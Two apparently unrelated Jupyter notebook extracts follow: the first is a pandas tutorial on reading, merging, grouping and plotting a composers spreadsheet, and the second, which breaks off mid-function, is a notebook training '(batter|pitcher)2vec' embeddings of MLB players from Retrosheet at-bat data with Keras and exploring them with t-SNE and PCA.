xlrd ``` An Excel table is provided in the [composers.xlsx](data/composers.xlsx) file and can be read with the `pd.read_excel` function. There are many more readers for other types of data (csv, json, html etc.) but we focus here on Excel. 
``` composers_df = pd.read_excel('data/composers.xlsx') composers_df ``` The reader automatically recognized the headers of the file. However it created a new index. If needed we can specify which column to use as header: ``` composers_df = pd.read_excel('data/composers.xlsx', index_col = 'composer') composers_df ``` If we open the file in Excel, we see that it is composed of more than one sheet. Clearly, when not specifying anything, the reader only reads the first sheet. However we can specify a sheet: ``` composers_df = pd.read_excel('data/composers.xlsx', index_col = 'composer', sheet_name='Sheet2') composers_df ``` As you can see above, some information is missing. Some missing values are marked as "`unknown`" while others are `NaN`. `NaN` is the standard symbol for unknown/missing values and is understood by Pandas while "`unknown`" is just seen as text. This is impractical as now we have columns with a mix of numbers and text which will make later computations difficult. What we would like to do is to replace all "irrelevant" values with the standard `NaN` symbol that says "*no information*". For this we can use the `na_values` argument to specify what should be a `NaN`: ``` composers_df = pd.read_excel('data/composers.xlsx', index_col = 'composer', sheet_name='Sheet2', na_values=['unknown']) composers_df ``` ## Missing data pandas primarily uses the value `np.nan` to represent missing data. It is by default not included in computations. ``` df_new = composers_df.copy() df_new ``` Get a boolean mask where values are `np.nan` ``` pd.isna(df_new) ``` To drop missing data. 
``` df_new.dropna(how='any') df_new.dropna(how = 'all') # the whole row (or column) must be np.nan ``` Filling missing data ``` df_new.fillna(value=5) ``` ## Writing and reading - CSV files ``` df_new.to_csv('data/foo.csv') df_read = pd.read_csv('data/foo.csv') df_read df_read = pd.read_csv('data/foo.csv',index_col = 'composer') df_read ``` ### Exercise [This repository](https://github.com/pcm-dpc/COVID-19) hosts the updated information about the evolution of the pandemic in Italy (as provided by the "Dipartimento della Protezione Civile). One way to programmatically get access to the data is through `urllib`: ``` import urllib CSV_URL = "https://raw.githubusercontent.com/pcm-dpc/COVID-19/master/dati-andamento-nazionale/dpc-covid19-ita-andamento-nazionale.csv" with urllib.request.urlopen(CSV_URL) as f: df = pd.read_csv(f,index_col = 0) df df.head() df.tail(1) df.columns ita_eng_columns = {'stato':'state', 'ricoverati_con_sintomi':'hospitalized_with_symptoms', 'terapia_intensiva': 'intensive_care', 'totale_ospedalizzati': 'total_hospitalized', 'isolamento_domiciliare': 'home_isolation', 'totale_positivi': 'total_positive', 'variazione_totale_positivi':'total_positive_variation', 'nuovi_positivi': 'new_positive', 'dimessi_guariti': 'healed', 'deceduti': 'deaths', 'casi_da_sospetto_diagnostico': 'positive_by_symtoms', 'casi_da_screening': 'positive_by_screening', 'totale_casi': 'total_cases', 'tamponi': 'pcr', 'casi_testati': 'tested_cases', 'note':'notes'} # uncomment to translate columns names in english # df.columns = [ita_eng_columns[x] for x in df.columns] df ``` Process and explore your data: - is it properly formatted? - are there missing values? - Tired of difficult to interpret graphics? Make your own! # DataFrame Operations One of the great advantages of using Pandas to handle tabular data is how simple it is to extract valuable information from them. Here we are going to see various types of operations that are available for this. 
## Matrix operations The strength of Numpy is its natural way of handling matrix operations, and Pandas reuses a lot of these features. For example one can use simple mathematical operations to operate at the cell level: ``` df = pd.read_excel('data/composers.xlsx') df df['birth'] * 2 np.log(df['birth']) ``` We can directly use an operation's output to create a new column: ``` df['age'] = df['death'] - df['birth'] df ``` Here we applied functions only to series. Indeed, since our Dataframe contains e.g. strings, no operation can be done on it. If however we have a homogeneous Dataframe, this is possible: ``` df[['birth', 'death']] * 2 ``` ## Column operations There are other types of functions whose purpose is to summarize the data. For example the mean or standard deviation. Pandas by default applies such functions column-wise and returns a series containing e.g. the mean of each column: ``` np.mean(df) ``` Note that columns for which a mean does not make sense, like the city are discarded. Sometimes one needs to apply to a column a very specific function that is not provided by default. In that case we can use one of the different `apply` methods of Pandas. The simplest case is to apply a function to a column, or Series of a DataFrame. Let's say for example that we want to define the age >60 as 'old' and <60 as 'young'. We can define the following general function: ``` define_age = lambda x: 'old' if x > 60 else 'young' ``` We can now apply this function on an entire Series: ``` df['categorical age'] = df.age.apply(define_age) df ``` We can also apply a function to an entire DataFrame. For example we can ask how many composers have birth and death dates within the XIXth century: ``` df[['birth','death']].apply(lambda x: np.sum((x >= 1800) & (x < 1900))) ``` ### Histogramming ``` df['categorical age'].value_counts() ``` # Data Merging Often information is coming from different sources and it is necessary to combine it into one object. 
We are going to see the different ways in which information contained within separate Dataframes can be combined in a meaningful way. ## Concatenation The simplest way we can combine two Dataframes is simply to "paste" them together: ``` composers1 = pd.read_excel('data/composers.xlsx', index_col='composer',sheet_name='Sheet1') composers1 composers2 = pd.read_excel('data/composers.xlsx', index_col='composer',sheet_name='Sheet3') composers2 ``` To be concatenated, Dataframes need to be provided as a list to the `pd.concat` method: ``` all_composers = pd.concat([composers1,composers2]) all_composers ``` One potential problem is that two tables contain duplicated information: ``` all_composers.loc['Mahler'] ``` It is very easy to get rid of it using: ``` pd.DataFrame.drop_duplicates? DataFrame().drop_duplicates all_composers.drop_duplicates() ``` ## Joining Another classical case is that of two lists with similar indices but containing different information: ``` composers1 = pd.read_excel('data/composers.xlsx', index_col='composer',sheet_name='Sheet1') composers1 composers2 = pd.read_excel('data/composers.xlsx', index_col='composer',sheet_name='Sheet4') composers2 ``` If we use simple concatenation, this doesn't help us much. We just end up with a large matrix with lots of `NaN`'s: ``` pd.concat([composers1, composers2]) ``` The better way of doing this is to **join** the tables. This is a classical database concept available in Pandas. `join()` operates on two tables: the first one is the "left" table which uses `join()` as a method. The other table is the "right" one. Let's try the default join settings: ``` composers1.join(composers2) ``` We see that Pandas was smart enough to notice that the two tables had an index name and used it to combine the tables. We also see that one element from the second table (Brahms) is missing. The reason for this is the way indices not present in both tables are handled. 
There are four ways of doing this with two tables called here the "left" and "right" table. ### Join left The two Dataframes that should be merged have a common index, but not necessarily the same items. For example here Shostakovich is missing in the second table, while Brahms is missing in the first one. When using the "left" join, we use the first Dataframe as basis and only use the indices that appear there. ``` composers1.join(composers2, how = 'left') ``` ### Join right When using the "right" join, we use the second Dataframe as basis and only use the indices that appear there. ``` composers1.join(composers2, how = 'right') ``` ### Inner join When using the "inner" join, we return only the items that appear in both Dataframes: ``` composers1.join(composers2, how = 'inner') ``` ### Outer join When using the "outer" join, we return all the items that appear in either Dataframe: ``` composers1.join(composers2, how = 'outer') ``` ## Merging Sometimes tables don't have the same indices but similar contents that we want to merge. For example let's imagine we have the two Dataframes below: ``` composers1 = pd.read_excel('data/composers.xlsx', sheet_name='Sheet1') composers1 composers2 = pd.read_excel('data/composers.xlsx', sheet_name='Sheet6') composers2 ``` The indices don't match and are not the composer name. In addition the columns containing the composer names have different labels. Here we can use `merge()` and specify which columns we want to use for merging, and what type of merging we need (inner, left etc.) ``` pd.merge(composers1, composers2, left_on='composer', right_on='last name') ``` Again we can use another variety of join than the default inner join. # Data Splitting Often Pandas tables mix regular variables (e.g. the size of cells in microscopy images) with categorical variables (e.g. the type of cell to which they belong). In that case, it is quite usual to split the data using the category to do computations. Pandas allows to do this very easily. 
## Grouping ``` composers_df = pd.read_excel('data/composers.xlsx', index_col = 'composer', sheet_name='Sheet5') composers_df composers_df.head() ``` What if we want now to count how many composers we have in each category? In classical computing we would maybe do a for loop to count occurrences. Pandas simplifies this with the `groupby()` function, which actually groups elements by a certain criterion, e.g. a categorical variable like the period: ``` composer_grouped = composers_df.groupby('period') composer_grouped ``` The output is a bit cryptic. What we actually have is a new object called *group* which has a lot of handy properties. First let's see what the groups actually are. As for the Dataframe, let's look at a summary of the object: ``` composer_grouped.describe() ``` So we have a dataframe with a statistical summary of the contents. The "names" of the groups are here the indices of the Dataframe. These names are simply all the different categories that were present in the column we used for grouping. Now we can recover a single group: ``` composer_grouped.get_group('baroque') ``` If one has multiple categorical variables, one can also do a grouping on several levels. For example here we want to classify composers both by period and country. For this we just give two column names to the `groupby()` function: ``` composer_grouped = composers_df.groupby(['period','country']) composer_grouped.get_group(('baroque','Germany')) ``` The main advantage of this Group object is that it allows us to do very quickly both computations and plotting without having to loop through different categories. Indeed Pandas does all the work for us: it applies functions on each group and then reassembles the results into a Dataframe (or Series depending on output). For example we can apply most functions we used for Dataframes (mean, sum etc.) on groups as well and Pandas seamlessly does the work for us. 
## Unstacking Let's have a look again at one of our grouped Dataframe on which we applied some summary function like a mean on the age column: ``` composers_df['age'] = composers_df['death'] - composers_df['birth'] composers_df.groupby(['country','period']).age.mean() ``` Here we have two level of indices, with the main one being the country which contains all periods. Often for plotting we however need to have the information in another format. In particular we would like each of these values to be one observation in a regular table. For example we could have a country vs period table where all elements are the mean age. To do that we need to **unstack** our multi-level Dataframe: ``` composer_unstacked = composers_df.groupby(['country','period']).age.mean().unstack() composer_unstacked ``` ## Plotting DataFrames Pandas builds on top of Matplotlib but exploits the knowledge included in Dataframes to improve the default output. We can pass Series to Matplotlib which manages to understand them. Here's a default scatter plot: ``` import matplotlib.pyplot as plt composers_df = pd.read_excel('data/composers.xlsx', index_col = 'composer', sheet_name='Sheet5') plt.plot(composers_df.birth, composers_df.death, 'o') plt.show() ``` Different types of plots are accessible when using the `plot` function of DataFrame instances via the `kind` option. The variables to plot are column names passed as keywords instead of whole series like in Matplotlib: ``` composers_df.plot(x = 'birth', y = 'death', kind = 'scatter') plt.show() composers_df.plot(x = 'birth', y = 'death', kind = 'scatter', title = 'Composer birth and death', grid = True, fontsize = 15) plt.show() ``` Some additional plotting options are available in the plot() module. 
For example histograms: ``` composers_df.plot.hist(alpha = 0.5) plt.show() ``` Here you see again the gain from using Pandas: without specifying anything, Pandas made a histogram of the two columns containing numbers, labelled the axis and even added a legend to the plot.
github_jupyter
# Table of Contents * [**Preparation**](#Preparation) * [**Introduction**](#Introduction) * [**Data Collection**](#Data-Collection) * [**Data Preprocessing**](#Data-Preprocessing) * [**Building and Training the Model**](#Building-and-Training-the-Model) * [**Qualitative Analysis of Player Vectors**](#Qualitative-Analysis-of-Player-Vectors) * [**t-SNE**](#t-SNE) * [**PCA**](#PCA) * [**ScatterPlot3D**](#ScatterPlot3D) * [**Player Algebra**](#Player-Algebra) * [**Nearest Neighbors**](#Nearest-Neighbors) * [**Opposite-handed Doppelgängers**](#Opposite-handed-Doppelgängers) * [**Modeling Previously Unseen At-Bat Matchups**](#Modeling-Previously-Unseen-At-Bat-Matchups) # Preparation I use Python 3, but everything should work with Python 2. 1. Install [HDF5](https://www.hdfgroup.org/HDF5/release/obtain5.html). 2. Install other packages: <code>pip install h5py keras matplotlib numpy pyyaml scipy scikit-learn seaborn tensorflow theano urllib3</code> # Introduction The goal of this project was to learn distributed representations of MLB players. Theoretically, meaningful representations (i.e., representations that capture real baseball qualities of players) could then be used for other types of analyses, such as simulating season outcomes following trades. <code>(batter|pitcher)2vec</code> was inspired by [<code>word2vec</code>](https://en.wikipedia.org/wiki/Word2vec) (hence the name), which is a model that learns distributed representations of words. These learned word vectors often have interesting properties; for example, Paris - France + Italy in the word vector space is very close to the vector for Rome (see [here](https://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf) and [here](http://arxiv.org/pdf/1301.3781.pdf) for more details). In this notebook, I'll show you how I built a model that simultaneously learns distributed representations of pitchers and batters from at-bat data. 
# Data Collection To start things off, let's download and extract some data from [Retrosheet.org](http://retrosheet.org/). We'll use play-by-play data from the 2013, 2014, 2015, and 2016 seasons. ``` import urllib.request import zipfile from os import makedirs from os.path import exists project_directory = "/home/airalcorn2/Projects/batter_pitcher_2vec/batter-pitcher-2vec/" # Change this. zip_name = "2010seve" data_directory = project_directory + zip_name if not exists(data_directory): makedirs(project_directory, exist_ok = True) zip_f = data_directory + ".zip" urllib.request.urlretrieve("http://www.retrosheet.org/events/{0}.zip".format(zip_name), zip_f) zip_ref = zipfile.ZipFile(zip_f, "r") zip_ref.extractall(project_directory + zip_name) zip_ref.close() ``` And now we'll prepare some variables for organizing the data. ``` import re from os import listdir from os.path import isfile, join data_files = [f for f in listdir(data_directory) if isfile(join(data_directory, f))] at_bats = {} home_runs = {} singles = {} doubles = {} counts = {"batter": {}, "pitcher": {}} data = {} train_years = ["2013", "2014", "2015"] test_year = "2016" year_match = r"201(3|4|5|6)" for year in train_years + [test_year]: data[year] = [] ``` Next, we'll read in the data. Unfortunately, this is going to be a bunch of spaghetti code. The goal is to collect the batter, pitcher, and outcome (e.g., strike out, home run) for every at-bat. By the end of the following code block, we'll have a Python list of dictionaries where each element has the format <code>{"batter": batter, "pitcher": pitcher, "outcome": outcome}</code>. To best understand what's going on in the code, you'll have to read through Retrosheet's [game file documentation](http://www.retrosheet.org/game.htm). ``` import string for data_file in data_files: year_re = re.search(year_match, data_file) if year_re is None: continue year = year_re.group() # Skip non-event files. 
if not (".EVA" in data_file or ".EVN" in data_file): continue f = open(join(data_directory, data_file)) home_pitcher = None away_pitcher = None line = f.readline().strip() while line != "": parts = line.split(",") # Get starting pitchers. if parts[0] == "id": while parts[0] != "play": line = f.readline().strip() parts = line.split(",") if parts[0] == "start" and parts[-1] == "1": if parts[3] == "0": away_pitcher = parts[1] else: home_pitcher = parts[1] # Get at-bat data. if parts[0] == "play": batter = parts[3] pitcher = home_pitcher if parts[2] == "1": pitcher = away_pitcher outcome = "" # Handle balks, intentional, walks, hit by a pitch, # strike outs, and walks.. if parts[-1][:2] in {"BK", "IW", "HP"}: outcome = "p_" + parts[-1][:2] elif parts[-1][0] in {"K", "I", "W"}: outcome = "p_" + parts[-1][0] # If the last pitch resulted in contact, figure out the pitch outcome. # See "Events made by the batter at the plate" here: http://www.retrosheet.org/eventfile.htm#8. pitches = parts[5] if len(pitches) > 0 and pitches[-1] == "X": play_parts = parts[6].split("/") main_play = play_parts[0] play = main_play.split(".")[0] if play[0] == "H": play = "HR" elif play[0] in string.digits: play = play[0] elif play[0] in {"S", "D", "T"}: play = play[:2] # Try to get first ball handler. if len(play) < 2: try: handlers = play_parts[1] if handlers in string.digits: play = play[0] + handlers[0] except IndexError: play = play[0] + "X" elif play[:2] == "FC": play = play[2] outcome = "h_" + play if play == "HR": home_runs[batter] = home_runs.get(batter, 0) + 1 elif play[0] == "S": singles[batter] = singles.get(batter, 0) + 1 elif play[0] == "D": doubles[batter] = doubles.get(batter, 0) + 1 # Ignore catcher interference and ambiguous singles. 
if outcome not in {"h_C", "h_S"} and outcome != "": data[year].append({"batter": batter, "pitcher": pitcher, "outcome": outcome}) at_bats[batter] = at_bats.get(batter, 0) + 1 counts["batter"][batter] = counts["batter"].get(batter, 0) + 1 counts["pitcher"][pitcher] = counts["pitcher"].get(pitcher, 0) + 1 # Handle pitcher changes. if parts[0] == "sub": if parts[-1] == "1": if parts[3] == "0": away_pitcher = parts[1] else: home_pitcher = parts[1] line = f.readline().strip() f.close() ``` ## Data Preprocessing OK, now that we have our raw data, we're going to establish some cutoffs so that we're only analyzing players with a reasonable number of observations. Let's just focus on the most frequent batters and pitchers who were involved in 90% of the at-bats. ``` cutoffs = {} percentile_cutoff = 0.9 for player_type in ["batter", "pitcher"]: counts_list = list(counts[player_type].values()) counts_list.sort(reverse = True) total_at_bats = sum(counts_list) cumulative_percentage = [sum(counts_list[:i + 1]) / total_at_bats for i in range(len(counts_list))] cutoff_index = sum([1 for total in cumulative_percentage if total <= percentile_cutoff]) cutoff = counts_list[cutoff_index] cutoffs[player_type] = cutoff print("Original: {0}\tNew: {1}\tProportion: {2:.2f}".format( len(counts[player_type]), cutoff_index, cutoff_index / len(counts[player_type]))) ``` As you can see, only 32% of batters and 46% of pitchers were involved in 90% of at-bats. Let's use these new cutoff points to build the final data set. 
``` final_data = [] original_data = 0 matchups = set() for year in train_years: original_data += len(data[year]) for sample in data[year]: batter = sample["batter"] pitcher = sample["pitcher"] matchups.add("{0}_{1}".format(batter, pitcher)) if counts["batter"][batter] >= cutoffs["batter"] and counts["pitcher"][pitcher] >= cutoffs["pitcher"]: final_data.append(sample) print("Original: {0}\tReduced: {1}".format(original_data, len(final_data))) print("{0:.2f}% of original data set.".format(len(final_data) / original_data)) ``` As you can see, we still retain a large amount of data even after removing infrequent batters and pitchers. Next, we're going to associate an integer index with each of our batters, pitchers, and outcomes, respectively. ``` import random FAV_NUM = 2010 random.seed(FAV_NUM) random.shuffle(final_data) categories = {"batter": set(), "pitcher": set(), "outcome": set()} for sample in final_data: categories["batter"].add(sample["batter"]) categories["pitcher"].add(sample["pitcher"]) categories["outcome"].add(sample["outcome"]) for column in categories: categories[column] = list(categories[column]) categories[column].sort() NUM_OUTCOMES = len(categories["outcome"]) print("NUM_OUTCOMES: {0}".format(NUM_OUTCOMES)) print(" ".join(categories["outcome"])) category_to_int = {} for column in categories: category_to_int[column] = {categories[column][i]: i for i in range(len(categories[column]))} import matplotlib.pyplot as plt import seaborn as sns outcome_counts = {} for year in train_years: for sample in data[year]: outcome = sample["outcome"] outcome_counts[outcome] = outcome_counts.get(outcome, 0) + 1 outcome_counts = list(outcome_counts.items()) outcome_counts.sort(key = lambda x: x[1], reverse = True) val = [x[1] for x in outcome_counts] symbols = [x[0] for x in outcome_counts] pos = range(len(outcome_counts)) fig, ax = plt.subplots() fig.set_size_inches(30, 30) ax = sns.barplot(x = val, y = symbols) plt.show() ``` We'll then use these newly defined 
integer indices to build the appropriate NumPy arrays for our model. ``` import numpy as np np.random.seed(FAV_NUM) from keras.utils import np_utils data_sets = {"batter": [], "pitcher": [], "outcome": []} for sample in final_data: for column in sample: value = sample[column] value_index = category_to_int[column][value] data_sets[column].append([value_index]) for column in ["batter", "pitcher"]: data_sets[column] = np.array(data_sets[column]) data_sets["outcome"] = np_utils.to_categorical(np.array(data_sets["outcome"]), NUM_OUTCOMES) ``` # Building and Training the Model We're now ready to build our model with [Keras](http://keras.io/). The model is similar in spirit to the <code>word2vec</code> model in that we're trying to learn the player vectors that best predict the outcome of an at-bat (the "target word" in <code>word2vec</code>) given a certain batter and pitcher (the "context" in <code>word2vec</code>). We'll learn separate embedding matrices for batters and pitchers. ``` from keras import optimizers from keras.layers import Activation, concatenate, Dense, Dropout, Embedding, Input, Reshape from keras.models import Model NUM_BATTERS = len(categories["batter"]) NUM_PITCHERS = len(categories["pitcher"]) VEC_SIZE = 9 ACTIVATION = "sigmoid" batter_idx = Input(shape = (1, ), dtype = "int32", name = "batter_idx") batter_embed = Embedding(NUM_BATTERS, VEC_SIZE, input_length = 1)(batter_idx) batter_embed = Reshape((VEC_SIZE, ), name = "batter_embed")(batter_embed) batter_embed = Activation(ACTIVATION)(batter_embed) pitcher_idx = Input(shape = (1, ), dtype = "int32", name = "pitcher_idx") pitcher_embed = Embedding(NUM_PITCHERS, VEC_SIZE, input_length = 1)(pitcher_idx) pitcher_embed = Reshape((VEC_SIZE, ), name = "pitcher_embed")(pitcher_embed) pitcher_embed = Activation(ACTIVATION)(pitcher_embed) batter_pitcher = concatenate([batter_embed, pitcher_embed], name = "batter_pitcher") output = Dense(NUM_OUTCOMES, activation = "softmax")(batter_pitcher) model = 
Model(inputs = [batter_idx, pitcher_idx], outputs = [output]) sgd = optimizers.SGD(lr = 0.01, decay = 1e-6, momentum = 0.9, nesterov = True) model.compile(optimizer = sgd, loss = "categorical_crossentropy") ``` And now we're ready to train our model. We'll save the weights at the end of training. ``` BATCH_SIZE = 100 NUM_EPOCHS = 100 VALID = False validation_split = 0.0 callbacks = None if VALID: from keras.callbacks import ModelCheckpoint validation_split = 0.01 callbacks = [ModelCheckpoint("weights.h5", save_best_only = True, save_weights_only = True)] X_list = [data_sets["batter"], data_sets["pitcher"]] y = data_sets["outcome"] history = model.fit(X_list, y, epochs = NUM_EPOCHS, batch_size = BATCH_SIZE, verbose = 2, shuffle = True, callbacks = callbacks, validation_split = validation_split) if not VALID: model.save_weights("weights.h5") model.load_weights("weights.h5") if VALID: plt.plot(history.history["loss"]) plt.plot(history.history["val_loss"]) plt.title("model loss") plt.ylabel("loss") plt.xlabel("epoch") plt.legend(["train", "valid"], loc = "upper right") plt.show() ``` We'll also train a logistic regression model so that we have something to compare to <code>(batter|pitcher)2vec</code>. ``` TRAIN_ALT = True alt_model = None if TRAIN_ALT: from scipy.sparse import csr_matrix, hstack from sklearn.linear_model import LogisticRegression X_batters = csr_matrix(np_utils.to_categorical(np.array(data_sets["batter"]), NUM_BATTERS)) X_pitchers = csr_matrix(np_utils.to_categorical(np.array(data_sets["pitcher"]), NUM_PITCHERS)) X = hstack([X_batters, X_pitchers]) y = np.argmax(data_sets["outcome"], axis = 1) alt_model = LogisticRegression(n_jobs = -1) results = alt_model.fit(X, y) ``` # Qualitative Analysis of Player Vectors Having trained the model, let's go ahead and fetch the distributed representations for all players. To do so, we need to define some functions that return a vector when provided with a player's integer index. 
``` from keras import backend get_batter_vec = backend.function([batter_idx], [batter_embed]) get_pitcher_vec = backend.function([pitcher_idx], [pitcher_embed]) # Retrieve distributed representation of players. batter_vecs = get_batter_vec([np.array(range(NUM_BATTERS)).reshape((NUM_BATTERS, 1))])[0] pitcher_vecs = get_pitcher_vec([np.array(range(NUM_PITCHERS)).reshape((NUM_PITCHERS, 1))])[0] player_vecs = {"batter": batter_vecs, "pitcher": pitcher_vecs} ``` Alright, let's find out if these representations are revealing anything interesting. First, let's collect some information about the players. ``` # Retrieve player data. player_data = {} for data_file in data_files: if ".ROS" in data_file: f = open(join(data_directory, data_file)) for line in f: parts = line.strip().split(",") player_id = parts[0] last_name = parts[1] first_name = parts[2] name = first_name + " " + last_name batting_hand = parts[3] throwing_hand = parts[4] position = parts[6] player_data[player_id] = {"name": name, "batting_hand": batting_hand, "throwing_hand": throwing_hand, "position": position} ``` ## t-SNE Next, we'll use the [t-SNE](https://en.wikipedia.org/wiki/T-distributed_stochastic_neighbor_embedding) algorithm to visualize the player vectors in two and three dimensions. ``` from mpl_toolkits.mplot3d import Axes3D from sklearn.manifold import TSNE NUM_PLAYERS = {"batter": NUM_BATTERS, "pitcher": NUM_PITCHERS} def run_tsne(player_type): """Run t-SNE on the player vectors. 
:param player_type: :return: """ params = {"batter": {"perplexity": 20, "learning_rate": 200, "init": "pca"}, "pitcher": {"perplexity": 20, "learning_rate": 200, "init": "random"}} tsne = TSNE(n_components = 3, **params[player_type]) manifold_3d = tsne.fit_transform(player_vecs[player_type]) fig = plt.figure() ax = fig.add_subplot(111, projection = "3d") ax.scatter(manifold_3d[:, 0], manifold_3d[:, 1], manifold_3d[:, 2], color = "gray") plt.show() params = {"batter": {"perplexity": 20, "learning_rate": 550, "init": "pca"}, "pitcher": {"perplexity": 20, "learning_rate": 200, "init": "random"}} tsne = TSNE(n_components = 2, **params[player_type]) manifold_2d = tsne.fit_transform(player_vecs[player_type]) (x, y) = (manifold_2d[:, 0], manifold_2d[:, 1]) plt.scatter(x, y, color = "gray") interesting_batters = {"Mike Trout", "Paul Goldschmidt", "Dee Gordon", "Ichiro Suzuki", "Bryce Harper"} interesting_pitchers = {"Clayton Kershaw", "Felix Hernandez", "Madison Bumgarner", "Aroldis Chapman", "Dellin Betances"} interesting_players = {"batter": interesting_batters, "pitcher": interesting_pitchers} for i in range(NUM_PLAYERS[player_type]): player_id = categories[player_type][i] player_name = player_data[player_id]["name"] if player_name in interesting_players[player_type]: plt.text(x[i], y[i], player_name, va = "top", family = "monospace") plt.show() return manifold_3d tsne_batters = run_tsne("batter") tsne_pitchers = run_tsne("pitcher") ``` ## PCA Let's also visualize the first few PCs of a [principal component analysis](https://en.wikipedia.org/wiki/Principal_component_analysis) (PCA) of the vectors and color them with various interesting properties. ``` import csv import pandas as pd playerID_to_retroID = {} reader = csv.DictReader(open("Master.csv")) for row in reader: playerID = row["playerID"] retroID = row["retroID"] playerID_to_retroID[playerID] = retroID # Get player salaries. 
reader = csv.DictReader(open("Salaries.csv")) salaries = {} for row in reader: if row["yearID"] == "2015": playerID = row["playerID"] retroID = playerID_to_retroID[playerID] log_salary = np.log2(int(row["salary"])) salaries[retroID] = log_salary # Set up other inteteresting data for coloring. max_hr_rate = max([home_runs.get(batter_id, 0) / at_bats[batter_id] for batter_id in at_bats if batter_id in categories["batter"]]) max_single_rate = max([singles.get(batter_id, 0) / at_bats[batter_id] for batter_id in at_bats if batter_id in categories["batter"]]) max_double_rate = max([doubles.get(batter_id, 0) / at_bats[batter_id] for batter_id in at_bats if batter_id in categories["batter"]]) max_salary = max([salaries.get(batter_id, 0) for batter_id in at_bats if batter_id in categories["batter"]]) batter_colors = {"player_id": [], "hand": [], "Home Runs": [], "Singles": [], "Doubles": [], "salary": []} for i in range(NUM_BATTERS): batter_id = categories["batter"][i] batting_hand = player_data[batter_id]["batting_hand"] batter_colors["player_id"].append(batter_id) batter_colors["hand"].append(batting_hand) # batter_colors["Home Runs"].append(str((home_runs.get(batter_id, 0) / at_bats[batter_id]) / max_hr_rate)) batter_colors["Home Runs"].append(str(home_runs.get(batter_id, 0) / at_bats[batter_id])) batter_colors["Singles"].append(str(singles.get(batter_id, 0) / at_bats[batter_id])) batter_colors["Doubles"].append(str((doubles.get(batter_id, 0) / at_bats[batter_id]) / max_double_rate)) batter_colors["salary"].append(str((salaries.get(batter_id, 0) / max_salary))) df = pd.DataFrame(batter_colors) from sklearn import decomposition # Run PCA. 
pca = decomposition.PCA() pca.fit(batter_vecs) print(pca.explained_variance_ratio_) projected_batters = pca.transform(batter_vecs) pca.fit(pitcher_vecs) print(pca.explained_variance_ratio_) projected_pitchers = pca.transform(pitcher_vecs) for i in range(3): df["pc{0}".format(i + 1)] = projected_batters[:, i] cmap = sns.cubehelix_palette(as_cmap = True) # fig = plt.figure() # ax = fig.add_subplot(111, projection = "3d") # ax.scatter(projected_batters[:, 0], projected_batters[:, 1], projected_batters[:, 2], color = df["Home Runs"], cmap = cmap) # ax.set_title("Batters") # plt.show() cs = sns.color_palette("hls", 8) batting_hand_color = {"Left": cs[0], "Right": cs[3], "Both": cs[5]} legend_data = [] legend_names = [] for (hand, color) in batting_hand_color.items(): batter_hands = df[df["hand"] == hand[0]] legend_data.append(plt.scatter(batter_hands["pc1"], batter_hands["pc2"], s = 50, color = color)) legend_names.append(hand) plt.title("Batting Hand") plt.legend(legend_data, legend_names) plt.show() for batter_color in ["Singles", "Home Runs", "Doubles", "salary"]: (f, ax) = plt.subplots() points = ax.scatter(df["pc1"], df["pc2"], c = df[batter_color], s = 50, cmap = cmap) f.colorbar(points) ax.set_title(batter_color) plt.show() ``` As you can see, there are some interesting patterns emerging from the representations. For example, right-handed hitters are clearly separated from left-handed and switch hitters. Similarly, frequent singles hitters are far from infrequent singles hitters. So, the model is clearly learning something, but whether or not what it's learning is non-trivial remains to be seen. Let's go ahead and save the t-SNE map and PC scores to CSV files so that we can play around with them elsewhere. ``` import csv def write_viz_data(player_type, projected, fieldnames, projection): """Write the visualization coordinates of the players to a file. 
:param player_type: :param projected: :param fieldnames: :return: """ out = open("{0}s_{1}.csv".format(player_type, projection), "w") output = csv.DictWriter(out, fieldnames = fieldnames) output.writeheader() for i in range(NUM_PLAYERS[player_type]): player_id = categories[player_type][i] row = {} for col in fieldnames: if col in player_data[player_id]: row[col] = player_data[player_id][col] row["2015_salary"] = 2 ** salaries.get(player_id, 0) xyz = ["x", "y", "z"] for j in range(3): if projection == "pca": row["PC{0}".format(j + 1)] = projected[i][j] else: row[xyz[j]] = projected[i][j] row["player_id"] = player_id if player_type == "batter": row["hr_rate"] = home_runs.get(player_id, 0) / at_bats[player_id] nothing = output.writerow(row) out.close() fieldnames = ["player_id", "name", "2015_salary", "position", "batting_hand", "throwing_hand", "hr_rate", "PC1", "PC2", "PC3"] write_viz_data("batter", projected_batters, fieldnames, "pca") write_viz_data("batter", tsne_batters, fieldnames[:-3] + ["x", "y", "z"], "tsne") fieldnames = ["player_id", "name", "2015_salary", "throwing_hand", "PC1", "PC2", "PC3"] write_viz_data("pitcher", projected_pitchers, fieldnames, "pca") write_viz_data("pitcher", tsne_pitchers, fieldnames[:-3] + ["x", "y", "z"], "tsne") ``` Let's also save the raw player vectors. ``` def write_distributed_representations(player_type, player_vecs): """Write the player vectors to a file. 
:param player_type: :param player_vecs: :return: """ out = open("{0}s_latent.csv".format(player_type), "w") fieldnames = ["player_id", "name"] + ["latent_{0}".format(i + 1) for i in range(VEC_SIZE)] output = csv.DictWriter(out, fieldnames = fieldnames) output.writeheader() for i in range(NUM_PLAYERS[player_type]): player_id = categories[player_type][i] row = {"player_id": player_id, "name": player_data[player_id]["name"]} for j in range(VEC_SIZE): row["latent_{0}".format(j + 1)] = player_vecs[i][j] nothing = output.writerow(row) out.close() write_distributed_representations("batter", batter_vecs) write_distributed_representations("pitcher", pitcher_vecs) ``` ## ScatterPlot3D To gain some additional intuition with the player representations, I recommend exploring them in my open source scatter plot visualization application, [ScatterPlot3D](https://sites.google.com/view/michaelaalcorn/projects/scatterplot3d). To run it: 1. Download the appropriate build. 2. Run with <code>java -jar ScatterPlot3D-&lt;version&gt;.jar</code> on Linux systems or by double-clicking the JAR on Windows. 3. Load the data. 4. Put 5, 6, and 7 for x, y, and z for "pitchers_tsne.csv" or 8, 9, and 10 for "batters_tsne.csv". 5. Click "Submit". You can then search, zoom, and rotate the data, and click on individual points for more details. For example: <img src="batters_tsne_all.png" width="600"> <img src="trout_goldschmidt.png" width="600"> Documentation can be downloaded [here](https://sites.google.com/view/michaelaalcorn/ScatterPlot3D/SupplementaryMaterials.zip?attredirects=0&d=1) and a gallery of application screenshots can be found [here](http://imgur.com/a/U833y). # Player Algebra ## Nearest Neighbors So, do these vectors contain any non-obvious information? Maybe comparing nearest neighbors will provide some insight. ``` import pandas as pd def get_nearest_neighbors(name, data, latent_vecs, player_names, k = 5): """Print the k nearest neighbors (in the latent space) of a given player. 
